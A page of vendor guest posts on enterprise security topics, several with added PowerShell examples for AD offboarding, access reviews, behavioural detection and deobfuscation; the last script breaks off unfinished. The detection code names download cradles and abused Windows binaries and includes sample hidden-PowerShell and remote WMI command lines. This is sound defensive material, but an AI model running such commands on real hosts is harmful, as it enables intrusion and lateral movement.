Guest Post, Author at Security IT Summit | Forum Events Ltd - Page 3 of 7



Escaping from Data Lockdown with a Digital Evolution


With data amassing at an exponential rate, digital transformation continues to be throttled as businesses struggle to extract the insight they need from that data. To get value from data, the right people need to be able to access what they need, when they need it, in a usable format. Peter Ruffley, CEO, Zizo, has previously detailed the first three aspects businesses should consider to get out of data lockdown: data access, responsibility and outcomes. With the data readily available and the company goals in mind, businesses need to ensure that the data they are analysing will be of value and help them meet those objectives.

Here, Peter highlights two further aspects for businesses to consider before they can move forward in their digital transformation journey. While there is no one-size-fits-all approach to suit every company, by having available and structured data with an open and flexible culture, organisations are in a much stronger position to take on this critical shift and escape from data lockdown. 

Data structure and analysis:

Data must be structured for purpose: clean and consistent data leads to better decisions and an easier transformation. Many specialists whose skill set is structuring data and building data structures hold fixed beliefs about how things should be done, and that can become a choke point for digital transformation. You have to be prepared to follow a business objective even if it apparently contradicts some deeply held beliefs of your IT colleagues, or if the data tells you something that goes against your intuition, rather than letting that derail the process.

Digital transformation isn’t a one-change process, but instead, a number of transformations will need to be made and augmented with other sources of structured data – it should be conducted as an ongoing rolling programme of incremental changes and additions. That adaptability to absorb other sources of data and find other business value is what this is all about.

It’s not digital transformation, it’s digital evolution. Some things may not go 100% to plan, so you have to change and adapt based on what those results tell you. And just because every decision can be driven by data does not mean you have to analyse all the data before you take each step. There is a real risk of paralysis through analysis; if you try to look at everything, you will end up doing nothing. Working in an agile way, trying something small to see if it works and using tools and techniques that let you scale up or down, allows smaller steps towards transformation to be taken faster.

Business value and collaboration:

The key to digital transformation success is collaboration and flexibility. Businesses need to be flexible enough to transform digitally as the marketplace does. The tools, techniques and technologies exist, but only some organisations will be smart, quick and united enough to actually take advantage of them.

By establishing clear ownership and a sense of collaboration within your company culture, the barriers to digital transformation will be diminished as team members acknowledge the changes that are going to be made to the business as a result of this transition. Without everybody on board, the transformation will not work. Technology is just one part of the process underpinning these changes; an open attitude towards the use of data within the organisation is a necessity.

People need to trust the data they’re using through provenance and understanding the business rules and objectives. Rather than trying to impose a rigid framework, using data as the foundation provides you with trusted evidence and reasoning, backed up by other areas of the business. If you’ve got a dialogue supported with data that you trust, stakeholders will buy into the initiative. 

Organisations can’t expect the deployment of tools and technologies to change their business overnight, but by having a more open and collaborative attitude towards the use of data within the organisation, underpinned by new tools and technology, a digital evolution can progress in the right direction. 

LogRhythm NextGen SIEM Platform – Build your security program on a solid foundation


By LogRhythm

Align your team, technology, and processes to see broadly across your IT and operating environments, uncover threats, and minimise risk — all within a single, unified platform. The LogRhythm NextGen SIEM Platform is at the centre of thousands of SOCs worldwide.

Detect threats earlier and faster. 
When it comes to stopping threats, seconds matter. That’s why we built our platform for speed. You’ll quickly identify threats, automate and collaborate on investigations, and remediate threats with agility.

Gain visibility across your environment.
Eliminate blind spots across your entire enterprise — from your endpoints to the network to the cloud. Easily search across your log and other machine data to find the answers you need and know what’s happening across your environment.

Work smarter, not harder.
Spend your time on impactful work instead of maintaining, caring for, and feeding your SIEM tool. Automate repetitive tasks and labour-intensive work so your team can focus on the areas where their expertise can make a difference.

Build for today, scale for tomorrow.
The complexity and scale of your environment are growing rapidly. Don’t settle for an entry-level solution that you’ll soon outgrow. Get high performance and reduced operating costs, for today and tomorrow.

Deploy in the cloud or on-prem.

Learn more at www.logrhythm.com.

The state of the security team: Are executives the problem?


By LogRhythm

A global survey of security professionals and executives by LogRhythm

Amid a slew of statistics on how job stress is impacting security professionals, we sought to learn the causes of the tension and anxiety, as well as to understand potential ways teams might alleviate and remediate the risk of job burnout.

We ran a global survey with security professionals and executives and investigated the tools those security professionals use to understand solution capabilities, deployment strategies, technology gaps, and the value of tool consolidation.

Key findings

“Now, more than ever, security teams are being expected to do more with less leading to increasing stress levels. With more organisations operating under remote work conditions, the attack surface has broadened, making security at scale a critical concern,” says James Carder, CSO and VP of LogRhythm Labs. “This is a call to action for executives to prioritise alleviating the stress and better support their teams with proper tools, processes, and strategic guidance.”

When asked what causes the most work-related stress, not having enough time is cited by 41 percent and working with executives by 18 percent. In fact, 57 percent of respondents think their security program lacks proper executive support — defined as providing strategic vision, buy-in and budget.

In addition, security professionals cite inadequate executive accountability for strategic security decisions as the top reason (42 percent) they want to leave their job. This is a worrying statistic, given that nearly half of companies (47 percent) are trying to fill three or more security positions.

If you are leading a security team or part of a SOC, hearing that stress is increasing in your space is likely no surprise. To keep up with the threats facing your organisation, it is clear there needs to be a cultural shift — and it must start at the top. It is no longer just the responsibility of a CISO or CSO. To ensure a company is secure, the board and executive team must supply their security team with the strategic guidance, a healthy budget, and the proper tools required to effectively do their jobs.

Further information is available in the full report, available from the LogRhythm website.

Joiner-Mover-Leaver process: Solve it once and for all?


By Tenfold Security

JML processes give IT and HR departments regular headaches and often create quite hefty conflicts between those two departments. What is this all about?

When a new employee joins your organization, HR will know about them first, as they sign the contracts and do the onboarding. Today, many employees will require IT system access in order to fill their job role. That means IT needs to know about new hires so they can onboard them as well with all the necessary resources:

  • Client hardware (PC, Laptop, etc.)
  • Active Directory accounts, group memberships
  • E-Mail access, distribution groups, access to shared mailboxes
  • Access to applications like ERP or CRM

If HR fails to pass on that information (for whatever reason), you might end up with a new employee not being productive on their first few days, because they can’t access important systems and data. This is not only a loss for the company, but also creates great frustration for the new hire.

The same challenge arises if HR forgets to inform IT about an employee who has recently left the organization. The result is orphaned user accounts, which pose a serious security risk and generate costs in the form of unused software licenses.

How do you solve the issue? We at tenfold, the leading mid-market Identity & Access Management solution, propose the following:

  • If you manage less than 500 users, let HR manually input new hires, leavers and data changes (for example last name changes or new telephone numbers) into tenfold. Our software will then distribute those changes to Active Directory and other systems. Your HR users don’t have to be domain administrators for this to work.
  • If you manage more than 500 users, attach your HR management or payroll system directly to tenfold to automate the whole process. Read all about how this is made possible by the tenfold Import Plugin: https://www.tenfold-security.com/en/import-plugin-tenfold/
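As an added illustration of the leaver half of this process (example code written for this page, not tenfold's software), the PowerShell below treats the HR export as the source of truth and offboards every enabled Active Directory account whose EmployeeID no longer appears in it, reporting accounts that cannot be matched at all. The CSV layout, the OU names and the search base are assumptions; it needs the RSAT ActiveDirectory module and rights over the target OUs, and is invoked here as a dry run with -WhatIf.

```powershell
#Requires -Modules ActiveDirectory
# Leaver reconciliation against the HR feed. Added example for this page, not tenfold's code.
# Assumptions: the HR export is a CSV with an EmployeeID column listing everyone still employed,
# every AD user under $SearchBase carries their HR EmployeeID, and the OU names fit your domain.
function Invoke-LeaverReconciliation {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)][string]$HrExportPath,
        [string]$SearchBase = 'OU=Staff,DC=corp,DC=example',          # assumed scope: keeps service and admin accounts out
        [string]$DisabledOu = 'OU=Disabled Users,DC=corp,DC=example'  # assumed parking OU where GPOs deny logon
    )
    $hrActive = @{}
    foreach ($row in Import-Csv -Path $HrExportPath) { $hrActive[$row.EmployeeID.Trim()] = $true }

    $adUsers = Get-ADUser -Filter 'Enabled -eq $true' -SearchBase $SearchBase -Properties EmployeeID, MemberOf
    foreach ($u in $adUsers) {
        if ([string]::IsNullOrWhiteSpace($u.EmployeeID)) {
            # Cannot be matched to HR at all: this is the orphan the article warns about
            Write-Warning "$($u.SamAccountName) is enabled but has no EmployeeID; review manually"
            continue
        }
        if ($hrActive.ContainsKey($u.EmployeeID.Trim())) { continue }   # still employed
        if (-not $PSCmdlet.ShouldProcess($u.SamAccountName, 'Offboard leaver')) { continue }

        # 1. Stop interactive and network logon immediately
        Disable-ADAccount -Identity $u
        # 2. Rotate the password so cached credentials and existing sessions lose their value
        $bytes = New-Object byte[] 32
        [Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
        $newPw = ConvertTo-SecureString -String ([Convert]::ToBase64String($bytes)) -AsPlainText -Force
        Set-ADAccountPassword -Identity $u -Reset -NewPassword $newPw
        # 3. Strip every group (this is also where licence-assigning groups come off),
        #    so a later re-enable cannot silently restore old access
        foreach ($groupDn in @($u.MemberOf)) {
            Remove-ADGroupMember -Identity $groupDn -Members $u -Confirm:$false
        }
        # 4. Leave an audit trail on the object, then park it
        Set-ADUser -Identity $u -Description "Leaver $(Get-Date -Format yyyy-MM-dd): not in HR export"
        Move-ADObject -Identity $u.DistinguishedName -TargetPath $DisabledOu

        [pscustomobject]@{
            SamAccountName = $u.SamAccountName
            EmployeeID     = $u.EmployeeID
            GroupsRemoved  = @($u.MemberOf).Count
        }
    }
}

# Constructed sample feed (two employees still active); in production this is HR's daily export.
$feed = Join-Path ([IO.Path]::GetTempPath()) 'hr-active.csv'
@'
EmployeeID,GivenName,Surname
10001,Alice,Example
10002,Bob,Example
'@ | Set-Content -Path $feed
# Dry run first: -WhatIf flows down to every AD cmdlet, so nothing is changed
Invoke-LeaverReconciliation -HrExportPath $feed -WhatIf
```

Run it with -WhatIf until the warnings about unmatched accounts are down to zero, then schedule it against the real export. The order of steps matters: disable and rotate the password before removing groups, so that an account is never left enabled with a known password while its entitlements are being stripped.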

If you would like to learn about the basics of access management in Microsoft environments (structure, access right levels, access control lists, inheritance) then download our detailed white paper “Best Practices For Access Management In Microsoft® Environments” at this link: https://www.tenfold-security.com/en/whitepaper-best-practices/  

Want to try tenfold for yourself? No problem, just register to download our free trial https://www.tenfold-security.com/en/free-trial/

Why endpoint security matters more than ever


The swiftly evolving threat landscape, combined with the huge increase in remote working, means that securing your organisation’s endpoints has never been more critical.

Here, George Glass, Head of Threat Intelligence at Redscan, explains the importance of endpoint security and why detecting and responding to the latest threats demands greater endpoint visibility and specialist expertise...

Next-generation endpoint protection is a must

As cyber threats continue to evolve, it’s increasingly clear that organisations must look beyond traditional endpoint security solutions.

Antivirus software remains essential, but relying on traditional AV tools, which are largely signature-based, can leave organisations vulnerable to more sophisticated threats. Most traditional AV solutions are estimated to block just 40% of attacks.

Detecting the latest advanced threats requires next-generation capabilities, such as those provided by Endpoint Detection and Response (EDR) and Next-Gen AV (NGAV) platforms. 

EDR and NGAV technologies provide deep visibility across devices by collecting raw telemetry relating to processes, file modifications and registry changes, and using behavioural analytics to examine events in near real-time. 

Fileless malware is a serious risk to organisations and the top critical threat to endpoints in 2020. However, without more advanced endpoint detection there is a real danger that these and other sophisticated attack vectors can be missed.
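As an added example of the behavioural analysis described above (written for this page; not Redscan's or any vendor's detection logic), the PowerShell below runs a handful of parent-child and command-line rules over process-creation telemetry, the kind of raw events an EDR collects. The event fields follow a Sysmon event 1 / Windows 4688 record, the sample events are constructed, and the rule list and severity thresholds are assumptions rather than a complete ruleset.

```powershell
# Behavioural rules over process-creation telemetry. Added example, not any vendor's logic.
# Each event carries Computer, ProcessId, ParentImage, Image and CommandLine (Sysmon 1 / 4688 fields).
function Invoke-ProcessBehaviourRules {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][pscustomobject]$Event)
    begin {
        $docApps     = '^(winword|excel|powerpnt|outlook|acrord32|msedge|chrome)$'
        $scriptHosts = '^(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|wmic|msbuild|certutil)$'
        $cradle      = '(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|bitsadmin|-urlcache)'
        # image name without path or .exe, tolerant of either separator
        $leaf = { param($p) (([string]$p -split '[\\/]')[-1] -replace '\.exe$', '').ToLower() }
    }
    process {
        $parent = & $leaf $Event.ParentImage
        $image  = & $leaf $Event.Image
        $cmd    = [string]$Event.CommandLine
        $hits   = @()
        if ($parent -match $docApps -and $image -match $scriptHosts) {
            $hits += 'Document or browser app spawned a script host'
        }
        if ($image -in 'powershell', 'pwsh') {
            if ($cmd -match '(?i)(-w(indowstyle)?\s+hidden|-nop\b|-noni\b|-e[a-z]*\s+[A-Za-z0-9+/=]{20,})') {
                $hits += 'PowerShell launched hidden/non-interactive or with an encoded command'
            }
            if ($cmd -match $cradle) { $hits += 'Download cradle: payload staged in memory, nothing written to disk' }
        }
        if ($image -eq 'mshta'    -and $cmd -match '(?i)(javascript:|vbscript:|https?://)') { $hits += 'mshta running inline or remote script' }
        if ($image -eq 'regsvr32' -and $cmd -match '(?i)(/i:\S*https?://|scrobj\.dll)')     { $hits += 'regsvr32 loading a scriptlet' }
        if ($image -eq 'wmic'     -and $cmd -match '(?i)/node:')                           { $hits += 'WMI invoked against a remote host (lateral movement)' }
        if ($hits.Count -gt 0) {
            $severity = if ($hits.Count -ge 2) { 'High' } else { 'Medium' }
            [pscustomobject]@{
                Host     = $Event.Computer
                Severity = $severity
                Process  = "$parent -> $image (PID $($Event.ProcessId))"
                Reasons  = $hits -join '; '
            }
        }
    }
}

# Constructed sample telemetry, not captured from a real host. The base64 blob is a placeholder:
# any blob this long after an -e/-enc style flag is enough to trip the rule.
$sampleEvents = @(
    [pscustomobject]@{ Computer = 'WS-042'; ProcessId = 4120; ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; CommandLine = '"WINWORD.EXE" invoice.docm' }
    [pscustomobject]@{ Computer = 'WS-042'; ProcessId = 4188; ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB' }
    [pscustomobject]@{ Computer = 'WS-042'; ProcessId = 4301; ParentImage = 'C:\Windows\System32\cmd.exe'
        Image = 'C:\Windows\System32\wbem\WMIC.exe'; CommandLine = 'wmic /node:FS01 process call create "cmd /c whoami"' }
    [pscustomobject]@{ Computer = 'WS-042'; ProcessId = 4412; ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe Get-ChildItem C:\Projects' }
)
$sampleEvents | Invoke-ProcessBehaviourRules | Format-Table -AutoSize
```

Of the four events, only the Word-spawned hidden PowerShell (High, three reasons) and the remote WMI call (Medium) are reported; the benign Word launch and the interactive PowerShell produce nothing. None of these rules needs a file hash, which is the point: a fileless attack is caught on what the process does, not on what was written to disk. In an EDR the High alert would be the trigger for an automated response such as terminating the process tree and isolating the host.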

The increasing risks of remote working

Providing employees with seamless access to the corporate network is essential to ensure that they can fulfil their roles effectively, but every device that connects to the network carries an inherent risk.

When employees work from home, they are located outside the protection of the corporate firewall, which can monitor and block incoming and outgoing communications to endpoint devices. Many organisations insist that employees connect to a Virtual Private Network (VPN) and while this can offer some security, ensuring all employees do so with regularity can be a challenge.

Employee devices are at greater risk for a number of other reasons too. Many often have unpatched software vulnerabilities and are operated by people susceptible to phishing, the most common attack vector used to target endpoints.

Malware such as Emotet is primarily delivered by email. Emotet includes modules for spreading across the network and acts as a loader for other malware, which is why an Emotet infection so often ends in ransomware.

The average cost per breach resulting from an attack on endpoints is over £7 million, more than twice the average cost of a general data breach (Ponemon Institute).

The significant damage and disruption that endpoint breaches can cause makes incident response critical. Securing endpoints is important because it helps organisations to reduce incident response times by disrupting and containing attacks earlier in the kill chain. Advanced tools like EDR can automate response actions, such as by terminating processes and isolating infected endpoints from a network, thereby ensuring infections are shut down as quickly as possible.

With threats deployed more quickly than ever, a swift response is vital to address critical vulnerabilities such as Zerologon and shutting down ransomware attacks, which can achieve full domain-wide encryption in just a matter of hours.

The challenges of endpoint security 

Early detection of endpoint attacks is imperative, but without a team of security experts to manage and monitor EDR and NGAV technologies around-the-clock, organisations will experience challenges with achieving the required security outcomes.

Next-generation endpoint solutions collect and analyse a huge volume of data, and the greater the number of devices and applications that are monitored, the more security alerts that can result. This causes growing complexity that can be difficult to manage for in-house teams, who may lack the specialist security training required to make sense of them.

Getting the best from the latest tools and reducing false positives requires security teams to draw upon a wide range of threat intelligence and develop custom rulesets that accurately identify the latest threat behaviours.

It is only by maximising the benefits of specialist technology that organisations will fully realise their endpoint security goals.

George Glass is Head of Threat Intelligence at Redscan, a leading UK-provider of Managed Detection and Response and security assessment services. 

To learn more, visit www.redscan.com/

Identity Access Management vs. Access Rights Management – What’s the Difference?


The terms access management (short: AM; also referred to as access rights management or just rights management) and identity & access management (short: IAM) are often used synonymously. In practice, however, they do not stand for the same thing. In this article, we are going to take a closer look at the difference between access rights management software and identity/access management solutions.

Check out the article at https://www.tenfold-security.com/en/identity-access-management-vs-permission-management-whats-the-difference/

If you are looking to secure data access in your organization by:

  • getting more visibility into your Active Directory environment
  • managing file server access rights in line with best practice
  • automating your user lifecycle tasks
  • letting users request access and having your business owners approve requests
  • achieving compliance with need-to-know permissions

Then try tenfold for free today and see how we will be able to make your IT infrastructure more secure from day one.

Request free trial at: https://www.tenfold-security.com/en/free-trial/

Meeting the Tests to get out of Data Lockdown


Digital transformation of any business has always been hampered by making sense of the underlying data, and that data has been growing in volume at an unprecedented rate, driven by the growth of IoT. It is the perfect storm: the need for real-time information keeps growing, while the rate at which data volume grows pushes that information further out of reach. Businesses need insight, not just data, which means getting the right information to the right person at the right time.

But the age-old problem remains today – how do you understand and see what data you have readily available, in a format that’s usable and that you can access at the right time? Peter Ruffley, CEO, Zizo, explores three aspects businesses must consider to get out of ‘data lockdown‘…

Data access 

There are a multitude of ways to store and access data, but a majority of businesses haven’t considered access to external data sources yet. When we begin to question how to enrich and improve data, one of the fundamental capabilities of this process is by integrating external third-party data sources, such as weather, crime or other open data sources. 

Businesses need to understand what they must do to make the process worthwhile, and ensure they have the right capabilities before they start. A common first approach for many organisations is to build from scratch and make it their own, rather than considering a buy approach: looking at what is already out there, exploring the marketplace, and transforming existing data for use within the business rather than starting from the ground up.

If they can’t combine different sources of data quickly and cost-effectively together, they won’t move forward. It makes sense to digitally transform an organisation if it is going to make use of what’s already out there, as being able to tap in and share other work and insights will make the exercise worthwhile and cost-effective. With combinations of solutions available in the marketplace that can accelerate the process by providing the necessary building blocks, it’s time to transform the digital transformation process. 

Data responsibility 

There remains a disconnect between IT teams and businesses’ impressions about what it means to provide the data. If both parties are not aligned with the same aims of the business, the project could stall at the first hurdle. Instead, organisations need to bridge the divide and encourage stronger collaboration between all stakeholders. When businesses realise where those holes are in their structure, it’s key to get people involved to solve those challenges. 

This involves change on three levels; personnel, cultural and technological. Who’s responsible for this chain? Whose action is it? How do we bring these teams together? The business might be storing a lot of data, but how can it be accessed, interrogated and made useful? How will the business’ data goals be defined? 

Typically, the digital transformation initiative comes from the top in the organisation. In order to get your business on board, you have to make a very clear case of what the benefits are. Employees need to trust that improvements will be made for them by doing this, rather than just dictating the plan. Digital transformation is a change programme, which impacts all aspects of the business. You therefore have to approach it in the same way that you would approach any change project – with clear objectives and an agreed process of identifying how you’re going to get value from data. With a compelling case, you have a much better chance of carrying it through with buy in from all stakeholders. 

Data and objective identification:

You can’t embark on a digital transformation initiative without a concept – you’re condemning the project to failure if the business is not engaged properly with the process before you start. In order to yield business benefit from data, organisations must identify the areas that will realise the most benefits. Even if they’re hypothetical, there must be measurable ambitions in place or milestones for this journey, so that there is an understanding of what you’re going to do, and what you want to get out of it. Or if those ambitions weren’t achieved, why not? What steps need to be taken next time? 

Organisations have to be able to collect the data and assess whether they can achieve their business objectives from that data. But a goal of just ‘digital transformation’, ‘digitising data’ or ‘making more money’ will never translate into a concrete business case. Goals need to be specific and measurable in order to determine the project roadmap and for success to be evaluated. 

More importantly, you have to understand where the data is in your organisation and what it’s being used for, before you start the process of transformation. The whole supply chain needs to be aware of the transformation and the demands that are going to be in place. You’ve got to be very open about this process, because there will be people who you haven’t thought of that might be impacted by the changes you’re making.

With easy access, a connected team and clear objectives, companies can have a clear outline of what it is they set out to achieve in their digital transformation, how they expect to make this transition with the data available, and who can take on what role in this process. 

User Access Review – What’s That?


By Tenfold Security

Users come, they stay, they leave, they move around between departments and they collect privileges on the way. That’s OK, they need privileges to do their jobs. But do they need all the privileges they have, always? That’s a question you need to ask yourself, for every user, repeatedly.

This article covers what a user access review is, why it is important for your business, and how you can simplify the process and raise your company’s IT security and level of data protection at the same time.

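As an added example of what such a review can surface (written for this page, not tenfold's code), the PowerShell below scores each user's group memberships against their department peers: a group held by a quarter or fewer of the peers is an outlier that probably travelled with the user from a previous role, a privileged group always needs re-justification, and a stale account should hold nothing at all. The sample users, the 25% threshold and the 90-day window are assumptions; the comment shows how to feed it from Active Directory instead.

```powershell
# Privilege-creep review against department peers. Added example, not tenfold's software.
function Get-AccessReviewFindings {
    param(
        [Parameter(Mandatory)][object[]]$Users,     # SamAccountName, Department, MemberOf (group names), LastLogonDate
        [string[]]$PrivilegedGroups = @('Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Account Operators', 'Backup Operators'),
        [double]$PeerShareThreshold = 0.25,          # assumed cut-off; tune per organisation
        [int]$StaleDays = 90                         # assumed window for "stale"
    )
    foreach ($dept in ($Users | Group-Object -Property Department)) {
        $peers = @($dept.Group)
        $freq  = @{}                                 # group name -> number of department peers holding it
        foreach ($p in $peers) { foreach ($g in $p.MemberOf) { $freq[$g] = 1 + [int]$freq[$g] } }

        foreach ($p in $peers) {
            foreach ($g in $p.MemberOf) {
                $share   = [math]::Round($freq[$g] / $peers.Count, 2)
                $finding = $null
                if ($g -in $PrivilegedGroups) {
                    $finding = 'Privileged group: owner must re-justify'
                } elseif ($peers.Count -ge 3 -and $share -le $PeerShareThreshold) {
                    $finding = 'Outlier for this department: likely carried over from a previous role'
                }
                if ($finding) {
                    [pscustomobject]@{ User = $p.SamAccountName; Department = $dept.Name; Group = $g; PeerShare = $share; Finding = $finding }
                }
            }
            if ($p.LastLogonDate -and $p.LastLogonDate -lt (Get-Date).AddDays(-$StaleDays)) {
                [pscustomobject]@{ User = $p.SamAccountName; Department = $dept.Name; Group = '(all)'; PeerShare = $null
                                   Finding = "No logon for $StaleDays+ days: disable and strip memberships" }
            }
        }
    }
}

# Constructed sample population. In production feed it from AD, e.g.:
#   Get-ADUser -Filter 'Enabled -eq $true' -Properties Department, MemberOf, LastLogonDate |
#     Select-Object SamAccountName, Department, LastLogonDate,
#       @{ n = 'MemberOf'; e = { $_.MemberOf | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' } } }
$now = Get-Date
$sampleUsers = @(
    [pscustomobject]@{ SamAccountName = 'alice'; Department = 'Finance'; MemberOf = @('Finance-Staff', 'Finance-Reports');                   LastLogonDate = $now.AddDays(-2) }
    [pscustomobject]@{ SamAccountName = 'bob';   Department = 'Finance'; MemberOf = @('Finance-Staff', 'Finance-Reports');                   LastLogonDate = $now.AddDays(-1) }
    [pscustomobject]@{ SamAccountName = 'carol'; Department = 'Finance'; MemberOf = @('Finance-Staff', 'Finance-Reports', 'Sales-Pipeline'); LastLogonDate = $now.AddDays(-5) }
    [pscustomobject]@{ SamAccountName = 'dave';  Department = 'Finance'; MemberOf = @('Finance-Staff', 'Domain Admins');                     LastLogonDate = $now.AddDays(-120) }
    [pscustomobject]@{ SamAccountName = 'erin';  Department = 'IT';      MemberOf = @('IT-Staff', 'Domain Admins');                          LastLogonDate = $now.AddDays(-1) }
)
Get-AccessReviewFindings -Users $sampleUsers | Format-Table -AutoSize
```

On the sample data this flags carol's Sales-Pipeline membership (one of four Finance users), dave's Domain Admins membership and 120-day absence, and erin's Domain Admins membership; IT has only two users, so no peer-based outlier is computed there. The peer comparison is what makes the review scale: the data owner is asked about the handful of unusual entitlements rather than every group on every user.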

Securing a hybrid and agile workforce


2020 has forced businesses to revise many of their operations. One significant transition has been the shift to a remote working model, for which many were unprepared in terms of equipment, infrastructure and security. As the Government now urges people to return to work, we are already seeing a shift towards a hybrid workforce, with many employees splitting their time between the office and working from home.

As organisations are now reassessing their long-term office strategies, front and centre to that shift needs to be their IT security underpinned by a dependable and flexible cloud infrastructure. Andrea Babbs, UK General Manager, VIPRE, discusses what this new way of working means long-term for an organisation’s IT security infrastructure and how businesses can successfully move from remote working to a secure and agile workforce.

Power of the Cloud

In light of the uncertainty that has plagued most organisations, many are looking to options that can future-proof their business and enable as much continuity as possible in the event of another unforeseen event. The migration of physical servers to the Cloud is therefore a priority, not only to facilitate agile working, but to provide businesses with greater flexibility, scalability and more efficient resources. 

COVID-19 accelerated the shift towards Cloud-based services, with more data than ever before now being stored in the Cloud. For those organisations working on Cloud-based applications and drives, the challenges of the daily commute, relocations for jobs and not being able to ‘access the drive’ are in the past for many. Cloud services are moving with the user – every employee can benefit from the same level of security no matter where they are working or which device they are using. However, it’s important to ensure businesses are taking advantage of all the features included in their Cloud subscriptions, and that they’re configured securely for hybrid working. 

Layered security defence 

Cloud-powered email, web and network security will always underpin IT security defences, but they are only the first line of defence. Additional layers of security are also required to help the user understand the threat landscape, both external and internal. Particularly when working remotely with limited access to IT support teams, employees must be ready to question and verify the authenticity of potential phishing emails or malicious links, and to interrogate their risk level.

With increased pressure placed on users to perform their roles faster and achieve greater results than ever before, employees will do what it takes to power through and access the information they need in the easiest and quickest way possible. This is where the cloud has an essential role to play in making this happen, not just for convenience and agility but also to allow users to stay secure – enabling secure access to applications for all devices from any location and the detection and deletion of viruses – before they reach the network. 

Email remains the most-used communication tool, even more so when remote working, but it also remains the weakest link in IT security, with 91% of cybercrimes beginning with an email. By implementing innovative tools that prompt employees to double-check emails before they send them, it can help reduce the risk of sharing the wrong information with the wrong individual. 

Additional layers of defence such as email checking tools, are removing the barriers which slow the transition to agile working and are helping to secure our new hybrid workforce, regardless of the location they’re working in, or what their job entails. 

Educating the user

The individual is often the main source of vulnerability in a company’s IT infrastructure. When remote working became essential overnight, businesses faced malware spreading from personal devices, distracted employees sending information to the wrong people, and an increase in COVID-related cyber-attacks.

For organisations wanting to evolve into a hybrid work environment, their IT security policies need to reflect the new reality. By re-educating employees about existing products and how to leverage any additional functionality to support their decision making, users can be updated on these cyber risks and understand their responsibilities.

Security awareness training programmes teach users to be alert and more security conscious as part of the overall IT security strategy. In order to fully mitigate IT security risks and for the business to benefit from an educated workforce, both in the short and long term, employees need to change their outdated mindset. 

Changing approach

The evolution of IT and security over the past 20 years means that working from home is now easily achievable with cloud-based setups, whereas in the not too distant past, it would have been impossible. But the key to a successful and safe agile workforce is to shift the approach of a full reliance on IT, to a mindset where everyone is alert, responsible, empowered and educated with regular training, backed up by tools that reinforce a ‘security first’ approach. 

IT departments cannot be expected to stay one step ahead of cybercriminals and adapt to new threats on their own. They need their colleagues to work mindfully and responsibly on the front lines of cyber defence, comfortable in the knowledge that everything they do is underpinned by a robust and secure IT security infrastructure, but that the final decision to click the link, send the sensitive information or download the file, lies with them. 

Conclusion

As employees prove they can work from home productively, the physical office is no longer a necessity. For many companies it is sink or swim when implementing a hybrid and agile workforce. Introducing and retaining flexibility in operations now will help organisations cope better with any future unprecedented events or crises.

By focusing on getting the basics right and powered by the capabilities of the Cloud, highlighting the importance of layered security and challenging existing mindsets, businesses will be able to shift away from remote workers being the ‘exception,’ to a secure and agile workforce as a whole.


How to block hidden malicious commands in obfuscated scripts


By Chris Corde, VP of Product Management, VMware Carbon Black

For a long time now, our Threat Analysts have flagged the growing threat of script-based attacks, especially those using Microsoft PowerShell and Windows Management Instrumentation (WMI) commands, and their ability to escape notice in many antivirus solutions. Increasingly, these attacks have become the standard way of gaining entry into corporate systems and moving laterally to inflict damage. Today we announce several new features to help prevent and detect script abuse, including an extension of our ability to prevent script-based attacks built on AMSI integrations, and the ability to translate the actual contents of obfuscated PowerShell scripts in the Carbon Black Cloud console.

In the current work-from-home/COVID-19 environment, these script-based attacks continue to grow in size and global spread. Common tools like PowerShell let attackers hide their intent behind obfuscated script content, and the resulting lateral movement is facilitated by abuse of Windows Management Instrumentation (WMI), Google Drive and process hollowing. According to our latest Incident Response Report, lateral movement made up a third (33%) of today’s attacks.

Detecting Stealthy Script Abuse 

To combat this stealthy attack technique, the Carbon Black Cloud has added capabilities that expose the exact commands behind obfuscated PowerShell scripts. By adding this capability directly into our NGAV product console, we’re able to assist less experienced security teams in detecting attacks they may have otherwise missed, as well as accelerate a formerly time-consuming investigation process. This feature also includes new insights on PowerShell scripts for those using older, legacy systems that don’t support AMSI.  

Because PowerShell is so widely used in enterprise IT environments, many of these obfuscated scripts go unnoticed by EPP solutions: they trigger either no alert or deceptively low-level alerts, which makes it easy for threat actors to hide malicious commands. Normally you would have to copy the script and paste it into an external translation tool that offers limited detail about the command line, and resolving it could take anywhere from several hours to days. The ability to translate these obfuscated scripts with a button click during alert triage or threat hunting saves analysts hours of investigation time by letting them see the code and decide immediately whether the intent is malicious.
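To make concrete what "translating" an obfuscated script involves, here is an added example (written for this page; not Carbon Black's implementation) that peels the usual encoding layers off a PowerShell command line, scores what comes out, and shows the complementary Script Block Logging setting that records the deobfuscated script block as event 4104 at the moment the script actually runs. The sample command line is constructed, the indicator list is an assumption rather than a complete ruleset, and the decoder never evaluates the script it unwraps.

```powershell
# Unwrap the common encoding layers of a PowerShell command line. Added example, not Carbon Black code.
# Handles -EncodedCommand (UTF-16LE base64 behind any unambiguous prefix PowerShell accepts: -e, -ec,
# -enc, ...) and the inline FromBase64String('...') literal, optionally gzip-compressed, used by stagers.
function Expand-ObfuscatedPowerShell {
    param([Parameter(Mandatory)][string]$CommandLine, [int]$MaxDepth = 5)
    $layers  = @()
    $current = $CommandLine
    for ($depth = 0; $depth -lt $MaxDepth; $depth++) {
        $next = $null
        $m = [regex]::Match($current, '(?i)(?<![\w-])-(e[a-z]*)\s+["'']?([A-Za-z0-9+/=]{8,})')
        if ($m.Success) {
            $flag = $m.Groups[1].Value.ToLower()
            if ($flag -eq 'ec' -or 'encodedcommand'.StartsWith($flag)) {
                $next = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[2].Value))
                $layers += [pscustomobject]@{ Layer = 'EncodedCommand'; Script = $next }
            }
        }
        if (-not $next) {
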